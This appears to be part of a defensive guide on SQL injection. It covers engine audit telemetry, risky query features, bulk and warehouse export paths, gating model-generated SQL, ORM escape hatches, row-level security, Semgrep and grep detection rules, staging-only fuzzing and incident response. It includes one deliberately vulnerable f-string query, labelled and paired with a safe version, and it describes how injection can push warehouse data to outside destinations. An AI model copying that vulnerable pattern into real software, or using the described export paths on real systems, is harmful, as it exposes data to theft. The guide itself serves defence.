Where the signal lives differs by engine. These are the first sources to enable and watch, before an incident rather than during one:

Reference Where to look by engine Audit and aggregate query telemetry; attribution and coverage vary widely by source.

Engine	Audit and query telemetry to enable and watch
PostgreSQL	`pg_stat_statements`, `pgaudit`, `log_statement`, and `application_name` tagged in logs
SQL Server	SQL Server Audit, Extended Events, Query Store
MySQL / MariaDB	audit log plugin, general query log, slow query log
Oracle	Unified Auditing, Fine-Grained Auditing (FGA)
Snowflake	`QUERY_HISTORY`, `ACCESS_HISTORY`, `QUERY_TAG`
BigQuery	Cloud Audit Logs, `INFORMATION_SCHEMA.JOBS`
Redshift	`SYS`/`STL` views, `STL_QUERY`, `STL_UNLOAD_LOG`
Databricks	query history, Unity Catalog and workspace audit logs

These sources are not equal, so treat the table as a starting point, not a guarantee of coverage. Most must be enabled deliberately (and some are edition- or permission-gated), several omit failed statements or particular query types, and a few log the full SQL text and bound values, which makes the telemetry itself sensitive. So: turn on what you need before an incident, protect and access-control the audit logs, log a normalized query fingerprint rather than raw SQL with values, attach request, tenant, and workflow attribution to every entry, and know each engine's retention and coverage limits so you are not surprised by what was never captured.

Modern query-feature footguns

"Parameterize values; allowlist structure" is the whole rule, but a surprising number of features blur the line between the two, and that blur is where careful teams still slip.

LIKE wildcards. Binding a value into a LIKE still leaves % and _ active inside it. That is not classic injection, but it lets a user turn a prefix search into a full-table scan or match far more than intended. Escape them with a LIKE ... ESCAPE clause when they should be literal, and escape in the right order: the escape character you pick (\, !, whatever) must itself be doubled or escaped first, then % and _, or an attacker manipulates the escaping layer itself by feeding in the escape character. Even when escaped, treat broad search as an availability concern: cap the term length, reject pathological patterns such as a leading % wildcard that defeats the index, and route genuinely open-ended search to an indexed or search-specific path rather than letting a %term% scan the table. Keep collation in mind as well: under a case- or accent-insensitive collation, even a correctly escaped pattern can match more rows than the literal text suggests, so match behavior is a function of the column's collation, not the escaping.
LIMIT and OFFSET. Some drivers will not bind these, so people interpolate them. They are values: coerce to integers and bind or clamp, never concatenate raw. Be strict about the range while you are at it: reject negative LIMIT or OFFSET, reject absurd values, and reject anything outside the driver and database integer range, since both negatives and overflow can throw errors or behave surprisingly per engine. They are also an availability footgun even when bound, since a huge OFFSET forces the engine to count and discard millions of rows: clamp the maximum limit and prefer keyset (seek) pagination so an attacker cannot demand expensive deep scans. Deep pagination usually drags two other costs along with the offset: a full ORDER BY sort of the result set and a COUNT(*) for the total, both of which get expensive at scale, so cap or approximate the count and make sure the sort is index-backed rather than letting either run unbounded. One specific trap drives teams to give up and concatenate: with PHP PDO's emulated prepares on, a bound integer is sent quoted (LIMIT '10'), MySQL rejects it as a syntax error, and people conclude "you cannot bind a LIMIT" and splice it in raw. You can bind it: pass it with PDO::PARAM_INT, or turn emulation off, and the quoting goes away.
JSON path and full-text expressions. JSON path strings (jsonb_path_query, JSON_EXTRACT) and full-text builders (to_tsquery, MATCH ... AGAINST) have their own little grammars; a user-supplied path or query concatenated in is injection into that grammar, not the value slot. JSON paths carry an availability footgun even when they are not injected: recursive descent and broad array wildcards can fan out into a denial of service over large documents, so limit the path depth and reject open-ended wildcards on user-supplied paths. For PostgreSQL search text, prefer plainto_tsquery or websearch_to_tsquery, which are intended for plain user input, over to_tsquery, which expects and trusts query syntax. They are the safer choice, not a free pass: still cap length, set a timeout, and design the search sanely so a valid-but-expensive query cannot become a denial of service. Decide deliberately which mode you are offering: plain user search (the websearch/plain functions) for normal users, and, only if you intend to expose advanced operators, treat that as a separate mini-language with its own allowlist of permitted operators and its own limits, rather than letting raw query syntax through under the banner of "search." The commonest form is interpolating the key itself into a ->> or -> accessor, which feels safe because it sits inside a JSON operator; the key is a value, so bind it:
```
# vulnerable: the JSON key is concatenated into the query text
cur.execute(f"SELECT * FROM events WHERE payload->>'{user_key}' = 'fail'")
# safe: the key is a value (or use jsonb_extract_path_text(payload, %s))
cur.execute("SELECT * FROM events WHERE payload->>%s = 'fail'", (user_key,))
```
Type coercion that defeats an index. A value's type is an availability and correctness footgun even when it is safely bound. Compare an indexed VARCHAR column against a number, WHERE phone = 123456789, and MySQL converts the whole column to a number to do the comparison, which abandons the index and forces a full-table scan: an application-level denial of service from a single well-typed request. The same implicit conversion is a logic trap too, since in MySQL 'anything' = 0 is true, so a numeric comparison against a string column can match rows it never should. Match the bound value's type to the column, and reject input that does not fit the column's type before it reaches the query.
Regex and SIMILAR TO. User-controlled patterns can inject regex operators, trigger catastrophic backtracking (a denial of service), or smuggle SQL-pattern syntax through SIMILAR TO. The practical defense is mostly avoidance: do not expose arbitrary regex where a substring or full-text search would do. Where you genuinely need it, cap pattern length, compile with a timeout where the engine supports one, reject nested quantifiers (the (a+)+ shape that drives backtracking), and prefer an engine with predictable, linear-time matching (RE2-style) over a backtracking one.
Dynamic filter DSLs and report builders. The "build a query from the user's filters" feature is the richest footgun of all: field names, operators, sort, and grouping are all structure, all attacker-chosen, and none can be a bound value. Every one of those choices needs an allowlist mapping input to fixed, known-safe tokens, and operators should be allowlisted per field type, not globally, a date field gets ranges, a string field gets equality and prefix, never the reverse. And "structure" here is more than fields and operators: boolean grouping and nesting, joins, aggregates, GROUP BY and HAVING, and null semantics are all attacker-chosen structure too, each needing its own allowlist, plus a cap on overall depth and complexity so a filter tree cannot nest its way into an unbounded or ruinously expensive query. Make those allowlists authorization-aware, not merely syntactically safe: a field, join, aggregate, or relationship can be perfectly valid SQL and still expose data the current role or workflow should never see, so the allowlist has to encode who may query what, not just what parses.

The tell is the same every time: if the user controls a name, an operator, or a pattern's grammar rather than a plain value, binding does not save you. To be precise, the bind still does its job, it stops injection into the SQL parser; what it cannot stop is injection into a secondary grammar riding inside the value, a regex, a JSON path, full-text query syntax, or a filter DSL. That grammar needs its own defense. Constrain it to a set you defined.

Bulk imports, ETL, and cloud warehouses

Most of the channels above are request-driven, but a large share of an application's SQL is built far from any web handler, in code that reads files, moves data in bulk, and runs analytics. Those paths are the ones nobody fuzzes, and they tend to run with broad privileges, which is why they are worth naming on their own.

Bulk, ETL, and import paths

Generated COPY and LOAD DATA statements, CSV-to-SQL loaders, warehouse ingestion jobs, admin import mappers, and background enrichment all tend to build SQL from data they do not control: file contents, column headers, sheet names, or a field mapping the user uploaded. These are a common second-order injection risk when file contents, headers, sheet names, or mappings are later reused to construct SQL: the bytes were written earlier, sometimes by a different system, and the unsafe statement is built when they are read back, often by a privileged batch role with file access. The fixes are the ones from Level 1 with a bulk-specific edge: move the row data through the driver's native bulk path rather than building statements out of it, a static COPY FROM STDIN command with the rows streamed and driver-encoded over the copy protocol (not SQL bind parameters), a prepared multi-row insert with bound values, or a real bulk-load API, never a string-built INSERT; treat headers and user-supplied column mappings as untrusted structure that must resolve through an allowlist of real columns, never reflect a spreadsheet header straight into an identifier; and run each import and reporting job under its own least-privileged role rather than the broad account the app already uses.

Cloud warehouses and analytics engines

The cloud data warehouse is the other modern surface, and it changes what injection buys. Snowflake, BigQuery, Redshift, Databricks SQL, and the BI query builders layered on top rarely hand an attacker an OS shell, but injection there converts into a different blast radius: cross-database and cross-dataset reads; external-stage and object-storage abuse (COPY INTO, UNLOAD, or EXPORT DATA to an attacker-controlled or attacker-readable destination the warehouse role or storage integration is permitted to write); misuse of the cloud identity the warehouse runs as (the attached IAM role, service account, or storage integration, which usually reaches far more than the current query); stored-procedure and UDF abuse (JavaScript and Python UDFs, external functions, and EXECUTE IMMEDIATE dynamic SQL); and bulk export of entire tables. BI tools deserve special caution: a report builder that assembles SQL from user-chosen dimensions, filters, and sorts is a dynamic filter DSL at warehouse scale, and the allowlist-the-structure rule applies unchanged. Defend it like any other database plus the cloud-native layers: bind values (major warehouse APIs and drivers support bind variables or parameter markers for values, with driver and statement-context exceptions), allowlist identifiers and dataset, schema, and stage names, scope the warehouse role and its attached cloud identity to least privilege, restrict external stages and network egress, lock down UDF and external-function creation, and enforce row-access policies and column masking so a query that does get through still cannot cross the datasets or columns it was never meant to see. One rule deserves to be explicit: never accept a user-supplied bucket, stage, URI, or export destination. Map a requested destination to a workflow-scoped, preapproved external location or storage integration, so an injected COPY INTO or EXPORT DATA has nowhere to send the data even if it runs.

When a model writes the query

The hardest case of all is when a model writes the query. The whole statement is structure you did not author, so the footgun is not one feature but the entire SQL surface. The strongest move is to not let the model emit arbitrary SQL at all: have it produce constrained JSON or an intent object that a deterministic query builder compiles into SQL, because validating a narrow internal DSL you defined is far easier than validating arbitrary SQL after the fact.

Where you must accept generated SQL, make the dangerous things impossible rather than discouraged. A read-only role is the floor, not the ceiling: pair it with a read-only transaction and read-only session settings, and revoke temp-object privileges where the engine supports it, so the sandbox cannot write, run DDL, or create temporary objects, which are a sneaky write and side-effect surface even when permanent DDL is already denied.

Then gate the statement, and make that gate dialect-specific and recursive: parse with the target engine's grammar, require exactly one statement, and inspect every subtree. A shallow "is it a SELECT?" check sails right past dangerous function calls, CTEs, subqueries, lateral joins, hidden table references, comments, stacked statements, and vendor-specific syntax. Reject anything the DSL does not explicitly need. The AST check is the primary gate; query-plan inspection of touched tables, functions, and row estimates is a supplemental, engine-specific add-on. Order matters: run the AST and function allowlist before the SQL ever reaches the planner. Planning is not free of consequences, it resolves and discloses object and schema metadata, and on some engines or configurations it can invoke planner-time functions, rewrite rules, or hooks, so handing un-vetted model SQL even to a non-executing plan is not automatically safe. When you do inspect a plan, use a non-executing one, plain EXPLAIN under the sandbox role, never EXPLAIN ANALYZE or anything that actually runs the query.

Allowlist deliberately and deny by default, not just "no writes": permit only specific tables, columns, joins, operators, and callable functions, since a read-only role can still invoke expensive, leaky, or side-effecting functions depending on the engine and config. Block the control surface too, beyond data changes: FOR UPDATE and LOCK TABLE, advisory locks, SET, transaction-control commands, and optimizer hints have no business in a generated read query, so reject them rather than assuming "read-only" already covers them.

Enforce row and tenant policy in the database underneath all of it, and cap output. Remember the slower exfiltration path: even with per-query output capped, an agent can page through and summarize sensitive rows across many turns, so the policy also has to bound the conversation or session budget, repeated paging over the same data, and what the model is permitted to reveal, not the size of one result alone.

Mind what your rejections say, as well. A detailed "unknown column x in table y" or "policy z blocked this" hands the model, or whoever is steering it, a free map of your schema and rules. Log the rich reason internally and return a bland error outward. And keep human approval in its place: it is for exceptional, policy-permitted workflows, not the control that stands between a generated DROP and your data; the app role should make that statement unrunnable in the first place.

The escape hatches by framework

Most mainstream ORMs and query builders bind values for you on their normal path, and every one also exposes raw or string-oriented APIs that bypass that safeguard. Many of those still bind when parameters are supplied separately; they turn injectable only when untrusted data is interpolated into the SQL text. The rule is the same across all of them: stay on the typed API, and when you need raw SQL, bind through it rather than interpolating. The middle column is the API to review and what to grep for; the last column is the correct way to use raw SQL when you must.

Reference Safe APIs and their raw escape hatches Per framework: the binding path, the hatch that bypasses it, and how to bind raw SQL when you must drop to it.

Framework	Safe API (binds for you)	Raw/string API to review	Correct raw-SQL bind
Django	`filter(col=v)`	`.raw(f"...{v}")`, `.extra()`, `RawSQL`	`.raw("...WHERE id=%s", [v])`
SQLAlchemy	`where(Col==v)`	`text("..."+v)`	`text("...=:v").bindparams(v=v)`
Rails / ActiveRecord	`where(col: v)`	`where("...#{v}")`, `Arel.sql`, `find_by_sql`	`where("col = ?", v)`
Laravel / Eloquent	`where('col', $v)`	`whereRaw("...$v")`, `DB::raw`	`whereRaw('col = ?', [$v])`
Prisma	`where: { col: v }`	$queryRawUnsafe(`...${v}`), `$executeRawUnsafe`, `Prisma.raw`	tagged `$queryRaw` / `$executeRaw`, `Prisma.sql`
Knex	`where({ col: v })`	`whereRaw("..."+v)`, `knex.raw(str)`	`whereRaw('col = ?', [v])`
TypeORM	`find({ where: { col: v } })`	`.query(str)`, `where("..."+v)`	`where("col = :v", { v })`
Sequelize	`findAll({ where: { col: v } })`	`query("..."+v)`, `literal()`	`query("...=$1", { bind: [v] })`; `replacements` only escapes (not bound)
Hibernate / JPA	Criteria API, `cb.equal(...)`	string-built HQL / JPQL	`setParameter("v", v)` on a named param
MyBatis	`#{v}` (bound parameter)	`${v}` (string substitution)	`#{v}` for values; allowlist any `${}` structure
Dapper	`Query(sql, new { v })`	interpolation into `sql`	`Query("...=@v", new { v })`
JDBC	`PreparedStatement` with `?`	`Statement` + concatenation	`ps.setString(1, v)`
EF Core	`Where(x => x.Col == v)`	`FromSqlRaw($"...{v}")`, `ExecuteSqlRaw($"...{v}")`	`FromSql($"...{v}")` (EF Core 7+), `FromSqlInterpolated` / `ExecuteSqlInterpolated` (earlier, and for commands)

Note: read the Dapper row carefully. Unlike the ORMs above it, Dapper does not build SQL for you, so it is not "safe by default," it is safe only when the SQL text is static and every value is passed as a parameter. Interpolate user input into the command string and it runs exactly what you wrote. The same holds for JDBC and any raw layer: the safety is in a constant SQL string plus bound values, not in the library itself.

Containment architecture for when one gets through

Parameterization is the control; containment decides what a missed one costs. "Least privilege" is the headline, but in practice it is an architecture, not a single GRANT.

If parameterization fails, each layer bounds how far the query reaches, and the highest-value fields at the center stay protected only when they are application-layer ciphertext or tokens whose keys live outside the database.

A role per app, service, and workflow. One shared, broadly privileged login means any injection anywhere reaches everything. Separate roles scope each blast radius to the job that owns it, and let a reporting or import path run with its own limited rights.
Separate ownership from runtime. The role the app connects with should not own its tables. Run migrations as a distinct owner or deployer role, and revoke CREATE on schemas the app has no reason to extend. After least privilege itself, separating the owner from the runtime role is one of the biggest practical containment wins.
Harden SECURITY DEFINER functions. They execute with the definer's rights, so a vulnerable one is an escalation path, especially when it references objects by unqualified name: if an attacker can create a shadow object in an earlier schema on the search_path, the function resolves to theirs and runs it as the definer. Schema-qualify the objects inside such functions, revoke schema CREATE so shadow objects cannot be planted, and explicitly set search_path to the trusted schemas with pg_temp last. Do not rely on omission: temp schemas can still be searched ahead of normal ones for relation and type names, so leaving pg_temp out is not the same as making it safe. Qualified names plus an explicit path are what actually close the shadowing window. And treat dynamic SQL inside a definer function as doubly dangerous, since it runs with elevated rights: bind every value (EXECUTE ... USING), allowlist any identifier, never build an object name from a caller-supplied string, and use safe identifier formatting (format('%I', ...), quote_ident) where a name truly must vary.
Read-only by default. Most endpoints only read. Give them a role that cannot write, and an injection on a read path cannot tamper or drop. Read-only is not inert, though: a role that can still execute side-effecting functions, unsafe definer functions, or extension functions has more reach than its name implies, so revoke EXECUTE on the functions and packages the app does not call, and set default privileges so newly created functions are not executable by the app role by accident, otherwise the next migration quietly re-opens the gap. Revoking from the app role is only half of it: audit what the role inherits, especially PostgreSQL's habit of granting EXECUTE to PUBLIC on new functions, which the app role gets for free unless you revoke it from PUBLIC and adjust default privileges. Mind overloads and schemas while you are at it: revoking one function name does not cover its other overloaded signatures, and an unsafe function sitting in a trusted, on-path schema is as dangerous as a direct table grant. As a default, write functions SECURITY INVOKER (run as the caller) and reserve SECURITY DEFINER for the few that need elevated rights.
Views that hide sensitive columns. OWASP calls these out specifically: expose each workflow or app role only to a view that omits password hashes, tokens, and PII, and even a successful SELECT * through injection cannot reach the columns you withheld. Scope it per role, the auth path that genuinely needs the hash can reach it through its own narrower role or a dedicated function, while the rest never can. A view only contains anything if the app role cannot also reach the base tables directly, so revoke the role's direct grants on the underlying tables and expose only the view or API surface intended for it, otherwise an injection just queries around the view. It reduces the blast radius rather than eliminating it, the projected rows may still hold regulated or business-sensitive data, so treat views as one containment layer, not a guarantee that a leak is harmless. In high-sensitivity PostgreSQL designs, mark such views security_barrier so a leaky or cleverly chosen user function cannot have its predicate pushed past the view's own filtering. Watch view ownership when combining views with RLS, too: a view runs with its owner's privileges by default, so it is the view owner's privileges that determine whether RLS on the underlying tables is applied or bypassed, not the calling role's; use security_invoker views (on supported PostgreSQL versions, 15 and later) for the cases where you intend the querying role's policies to be enforced.
Encrypt or tokenize the highest-value fields, with keys the database cannot reach. For the data a leak would hurt most, secrets, tokens, payment and identity fields, store ciphertext or a surrogate token and keep the keys in a KMS or a separate service, so a successful read returns opaque bytes rather than plaintext, and decrypt only through narrow, audited application workflows that genuinely need it. The caveat is what does not count: transparent database encryption (TDE) protects files at rest, not query results, and any scheme whose keys are reachable by the injected database role, decryption done in the database, a key sitting in a table, a UDF that unwraps it, leaves the blast radius unchanged, because the attacker's query can decrypt exactly as the application does. The protection only holds when the key lives somewhere the injected query cannot follow.
Tenant isolation with row-level security. In multi-tenant systems, enforce the tenant boundary in the database, not just the query. PostgreSQL's row-level security attaches a policy to every row, so an injected OR 1=1 still cannot cross tenants: the engine filters by policy regardless of the WHERE clause the attacker wrote. It only holds when it is set up correctly, though, enable it on every protected table, keep the runtime role a non-owner that is not a superuser and lacks BYPASSRLS, and use FORCE ROW LEVEL SECURITY where the owner or deployer role may query through the same path (policies otherwise do not apply to a table's owner; it is not always required when the app role is already a non-owner). Get the setup wrong and it is decorative; get it right and it holds even when the query does not.
Cover writes, not just reads. A USING clause filters which rows a query can see, but new rows created by an injected INSERT or UPDATE, or rows moved into another tenant, must also pass an effective write check. PostgreSQL supplies one implicitly when an ALL policy defines USING and no WITH CHECK (and for some write policies that define only USING), applying that same expression to the rows being written. A policy written specifically FOR INSERT cannot have USING, so it must use WITH CHECK. Without an effective check the read side is contained while the write side leaks, which matters because injection threatens integrity, not confidentiality alone.
Mind permissive versus restrictive policies. Multiple permissive policies are combined with OR, so each one only ever widens access: a single accidental broad permissive policy can quietly undercut the whole tenant boundary. Use restrictive policies (combined with AND) for the invariants that must always hold, but remember they only narrow access, they never grant it: at least one permissive policy still has to allow the row, so a table with only restrictive policies returns nothing. Review the full set of policies on a table together, not one at a time.
RLS does not cover helper functions. Policies do not protect you from functions that intentionally expose protected rows or run with elevated rights, so audit any SECURITY DEFINER function that touches tenant-scoped tables, it can hand back exactly the rows the policy was meant to hide.
RLS is not a full noninterference proof. A few operations sit outside row security even when policies are correct: TRUNCATE and REFERENCES are not subject to RLS, and a foreign-key or other referential-integrity check can become a covert channel that confirms whether a value exists in a tenant-scoped table without returning the row. Constrain these with table privileges and schema design rather than assuming the policy covers them.
Tenant context and connection pools. RLS is only as trustworthy as the tenant context it reads. A policy keyed on a session variable like current_setting('app.tenant_id') can be subverted if an injection changes that value, or if a pooled connection silently reuses the previous request's value. Disabling stacked statements is not enough on its own here: set_config('app.tenant_id', ...) is an ordinary SQL-callable function, so an injection that can run a function, subquery, or CTE before the protected access can move the tenant context without ever stacking a second statement. The deeper rule is that if the runtime role is allowed to choose its own tenant context, arbitrary SQL running as that role can choose it too, so app-writable GUC-based RLS is useful defense-in-depth against an omitted tenant predicate, not a hard boundary against injection. Stronger isolation derives tenant identity from something the injected role cannot change: per-tenant database roles where practical (which can grow operationally heavy at large tenant counts), or a connection design that fixes identity before dropping to a restricted role. Where you do rely on a session variable at scale, SET LOCAL inside a transaction with multi-statements disabled and the connection-pool reset verified is the better arrangement, but treat it as containment depth rather than the boundary itself. Whichever you choose, the policy must fail closed: if app.tenant_id is missing, malformed, or unset after a pool reset, it should return no rows or raise, never fall back to a default tenant or broad access. That silent fallback is the quiet failure mode in app-set session-variable RLS, and it converts a missing variable into a cross-tenant leak. Mind the pooler mode, too: transaction-pooling setups (PgBouncer and the like) can break assumptions about session variables, prepared statements, and reset behavior. SET LOCAL inside an explicit transaction is the right direction, but it only holds if the pooler preserves that transaction boundary rather than multiplexing the statements across backends.

The mechanics above are PostgreSQL's, because it exposes the most of this surface in the open, but every major platform has analogous controls. Map them across before assuming a control is Postgres-only:

Reference Cross-platform containment controls The same row, column, and elevated-execution boundaries, by engine.

Platform	Row filtering	Column hide / mask	Delegated / elevated access to audit
PostgreSQL	RLS policies (`USING` / `WITH CHECK`), `FORCE RLS`	column `GRANT`s, `security_invoker` / `security_barrier` views	`SECURITY DEFINER` functions
SQL Server	Row-Level Security (security policies + predicates)	Dynamic Data Masking, column `GRANT`, views	`EXECUTE AS`, ownership chaining
Oracle	VPD (`DBMS_RLS` policies)	Data Redaction, views	definer-rights (`AUTHID DEFINER`) packages
Snowflake	row access policies	masking policies, secure views	owner's-rights procedures; external functions / external access integrations
BigQuery	row access policies	policy tags (column-level), authorized views	authorized views and routines
Databricks (Unity Catalog)	row filters	column masks	dynamic views; external-location governance

One caveat on the masking column: masking is not encryption and not a substitute for revoking access to the base objects. Depending on the platform and the grants, a role with broad or ad hoc query privileges can often infer or bypass masked values, so treat masking as a presentation-layer control on top of real access revocation, not as the boundary itself.

Each layer holds even when the code does not. Containment starts from the assumption that a query will be built wrong some day, and arranges things so that day is survivable.

Proving you did it

Writing the defense is one thing; proving on demand that it is real, and stays real, is another. A verification program for injection has a few moving parts:

Code review with a pattern in mind. Treat string-built SQL as guilty until proven innocent, and require that every dynamic-SQL exception names the allowlist that justifies it. "Why is this concatenated?" should have a written answer in the diff. The structural fix is to centralize query construction: route raw and dynamic SQL through a small set of helpers where binding, allowlists, logging, and tests are enforced once, so review has a handful of files to watch instead of every call site. Make it stick with the inverse rule: a lint or CI policy that forbids ad hoc raw SQL anywhere outside those helpers, otherwise centralization is aspirational and drifts back to scattered call sites. That policy should be a rule, not a wiki page. The Semgrep starting point below flags the common inline f-string and concatenation forms passed straight to execute() outside the reviewed helpers; it is a tripwire, not full coverage (it misses SQL assembled into a variable first, percent-formatting, executemany, and wrapper functions), and the convention it assumes is that all such code lives under a db/ package, so point the exclude path at wherever yours actually lives:
```
# Semgrep (starting point): ban ad hoc raw SQL outside the reviewed db/ helpers
rules:
  - id: raw-sql-only-in-db-helpers
    languages: [python]
    severity: ERROR
    message: >
      Dynamic SQL built by f-string/concat must live in the reviewed db/
      helpers, where binding and allowlists are enforced once.
    paths:
      exclude: ["**/db/**", "**/tests/**"]
    patterns:
      - pattern-either:
          - pattern: $CUR.execute(f"...", ...)
          - pattern: $CUR.execute("..." + $X, ...)
          - pattern: $CUR.execute("...".format(...), ...)
```
Review migrations like code. The containment above lives in schema and grants, so changes to it deserve the same scrutiny as application code. Treat GRANT and REVOKE, CREATE EXTENSION, SECURITY DEFINER, RLS policy edits, and changes to ownership, schema, or default privileges as security-relevant diffs that a reviewer signs off on, since one loose grant or a dropped policy in a migration silently dismantles a control you carefully built.
Static analysis in CI. Semgrep, CodeQL, and commercial SAST trace taint from a request into a query sink. Fail the build on the signal you trust, high-confidence taint rules and any new or changed dangerous sink in the diff, and route the noisier findings to triage rather than blocking on them. A gate calibrated this way gets respected; one that fails on every false positive gets disabled. A taint rule you trust looks like this, request data reaching the SQL text of execute(), with numeric coercion and an allowlist lookup treated as sanitizers so they do not trip it (tune the sources and sanitizers to your framework, and run it alongside Semgrep's maintained registry rules, not instead of them):
```
# Semgrep (starting point): request data reaching the SQL text of execute()
rules:
  - id: tainted-data-into-sql-string
    languages: [python]
    severity: ERROR
    mode: taint
    message: >
      User input flows into the SQL text of execute(). Pass it as a bound
      parameter (placeholder + value), not by concatenation or f-string.
    pattern-sources:
      - pattern: flask.request.args.get(...)
      - pattern: flask.request.form.get(...)
    pattern-sanitizers:
      - pattern: int(...)              # numeric coercion
      - pattern: SORT.get(...)         # lookup against the specific trusted allowlist map (name it; never a metavariable)
    pattern-sinks:
      - patterns:
          - pattern: $CUR.execute($SQL, ...)
          - focus-metavariable: $SQL   # the query text only, bound params are safe
```
Name that sanitizer after the real allowlist map (SORT here): a bare metavariable like $ALLOW.get(...) matches .get() on any receiver, including the tainted source itself, so it would quietly defeat the whole rule. Even the specific form is only safe when the map is static and trusted and a miss is rejected before the query is built; a lookup that can return attacker-influenced text, or that falls through to the raw value on a miss, would silently suppress real findings. Both snippets are Python, since Semgrep rules are per-language, but the same source-to-sink shape ports to the equivalent escape hatches in JS, Java, PHP, and Ruby.
Grep as a cheap backstop. Even a CI grep catches a lot of the obvious cases: search for raw, literal, whereRaw, .extra(, EXEC(, and f-strings or + concatenation next to SELECT/INSERT/UPDATE. Each hit is a place to confirm a bind or a named allowlist. Add the framework escape hatches to the list: $queryRawUnsafe (Prisma), text() and literal_column (SQLAlchemy), .query( (TypeORM), ${...} (MyBatis), DB::raw (Laravel), find_by_sql and Arel.sql (ActiveRecord), and interpolated SQL in Dapper. Grep sp_executesql too, but treat it as a review target rather than a finding: it is the safe SQL Server pattern as long as the statement is static and the values are passed as parameters instead of concatenated into the string. Treat the whole list that way, in fact, every hit is a place to look, not a confirmed bug. Several entries (text(), DB::raw, Arel.sql) are perfectly safe when fed bound parameters and trusted, static fragments; the grep finds the conversations to have, and the review decides which are real. Extend the same grep to the bulk and warehouse paths, which app-layer patterns miss: COPY, COPY INTO, LOAD DATA, BULK INSERT, UNLOAD, EXPORT DATA, EXECUTE IMMEDIATE, copy_expert, and references to a stage or external location, then confirm each builds its statement and its object names from constants and allowlists, not from file contents or request input.
Unit and property tests for the allowlist layer. The structural defenses, query builders, sort handlers, and filter DSLs, are code you can test directly. Feed them malicious field names, unexpected operators, and bogus sort directions, and assert that each is rejected or mapped to a known-safe token. That proves the allowlist itself, the part SAST and DAST struggle to reason about, and pins the behavior so a later refactor cannot quietly loosen it.
Dynamic testing and fuzzing. DAST, parameter fuzzing, and a controlled sqlmap run against staging prove the running app rather than the source, and catch the second-order and config-dependent cases SAST cannot see. Keep it responsible: only against systems you own, on staging rather than production, rate-limited, with destructive tests off unless they are explicitly planned. It only finds what it can reach: SQL injection often hides behind authentication, CSRF and session flows, multi-step forms, imports, and background jobs, so the run has to be authenticated and stateful, exercising those paths with seeded data rather than just hammering the public surface. For the second-order cases specifically, plant the bait: seed canary payloads through imports, profile fields, and webhooks, then exercise the features that later reuse that stored data, reports, background jobs, notifications, exports, and admin views, and watch for the payload firing downstream. That is how you catch the read that was built unsafely long after the write that looked fine. Use out-of-band canaries as well as payload canaries: point a staging DNS or HTTP callback domain at your own collector and watch for blind hits, which safely surfaces the blind OOB paths, SSRF-style DB integrations, and UNC/SMB callbacks that return nothing in the response itself. Test the tenant boundary explicitly while you are in there: seed two tenants with canary rows and assert that no payload, from one tenant's session, can read or write the other's data. Cross-tenant leakage is exactly the failure RLS and tenant context are meant to prevent, and it is the one a generic scanner will not think to check.
Fingerprint the generated SQL in staging. Log the queries your features actually emit, then assert their shape: when a test exercises a path, check that the SQL matches the expected template and uses bind markers rather than inlined literals. This is how you catch the "safe-looking UI path that quietly built raw SQL" bug before production, where neither a grep nor a type signature would have flagged it. Log the normalized template or fingerprint, not the full SQL with bound values, otherwise the diagnostic itself becomes a sensitive-data sink; assert on the bind markers and the query shape, and keep retention and access to those logs tight. Watch specifically for literal inflation: a useful assertion is that the shape uses bind markers and does not inline high-cardinality request values into the SQL text, because a query can match the expected structure while still smuggling raw literals where parameters belong.
Lock and test driver configuration. The defenses you rely on are often defaults, and defaults drift on upgrade: a driver or ORM bump can quietly flip emulated prepares, multi-statement support, escaping behavior, a raw-query API, or type binding. Pin those settings explicitly and add a test that asserts the dangerous ones are off so a routine upgrade cannot silently reopen a hole. Do not stop at reading the config back; prove the behavior with integration tests against a real database: assert that a stacked statement is actually rejected, that emulation is off where you expect, and that a bound parameter is sent as a bind rather than inlined into the SQL text. That last one is hard to see from ordinary DB logs, since many systems render binds back inline for readability, so confirming it usually means driver or wire-protocol instrumentation, prepared-statement metadata, or a controlled test payload that would error if it were ever parsed as code. Config flags and runtime behavior drift apart, and it is the behavior that matters. Pin dependency versions too, but pair the pin with an intentional upgrade process and config regression tests, never-upgrading is its own security problem; the goal is upgrades that are deliberate and verified, not frozen.

Keep the line between the two environments clear: active exploitation tooling (sqlmap, fuzzers, injected payloads) belongs on staging. In production, verification is passive, telemetry, canaries, and rate and query-shape signals that flag an attack without becoming one. Do not point active scanners at production traffic or data.

Make one rule non-negotiable and most of this enforces itself: every piece of dynamic SQL must reference a named allowlist. If a query varies its structure and there is no allowlist next to it, that is the finding, before anyone even tries to exploit it.

When it happens anyway

MOVEit is the reminder that one missed query can mean full compromise, so the response plan matters as much as prevention. If you suspect SQL injection has been exploited, the checklist runs roughly:

Preserve evidence first, where you safely can. Rotation and reboots wipe exactly the state an investigation needs. Before you start tearing things down, snapshot the web roots, application and database audit/query logs, the WAF, reverse-proxy, and CDN logs (often the only place the original HTTP parameter, encoding, body, cookie, or duplicated parameter survives, which you need to reconstruct the exploit), running process lists, active and unusual database sessions, filesystem timestamps, and cloud and network flow logs. Where it is safe to, take a database snapshot too, a volume or managed snapshot before any destructive cleanup, so investigators have a frozen copy to reconstruct what the attacker's queries did. A few minutes of capture is the difference between knowing what was taken and guessing. It only correlates if the clocks agree: without synchronized time across the WAF, app, database, proxy, and cloud logs, stitching the timeline back together gets mushy fast, so confirm time sync is in place before an incident, not during one.
Isolate egress, then cut access. Block the database host's outbound network to stop exfiltration in progress, then rotate database and application credentials and kill active sessions; assume the connection string and any cached secrets are burned.
Account for what the data itself unlocks. If the query could have reached password hashes, session tables, password-reset tokens, API keys, or OAuth refresh tokens, the breach is also a credential breach: invalidate sessions, force resets, and rotate the exposed keys and tokens as part of containment, not after. Stolen secrets are how a one-time read becomes ongoing access.
Hunt for persistence. Inspect web roots for dropped shells, and review triggers, scheduled jobs, stored procedures, and any new or newly elevated database and admin users, the places a query-to-shell pivot leaves itself a way back. Check the "database to elsewhere" footholds too: database links, foreign servers, and linked servers; external data sources; saved credentials and proxy accounts; replication and CDC jobs; and any cloud integration credentials the instance holds.
Check for integrity damage, not just theft. Injection writes as well as reads: look for unexpected UPDATE or DELETE activity, new admin accounts, changed roles or grants, modified stored procedures and triggers, and altered scheduled jobs. Tampering is easy to miss when everyone is focused on what leaked.
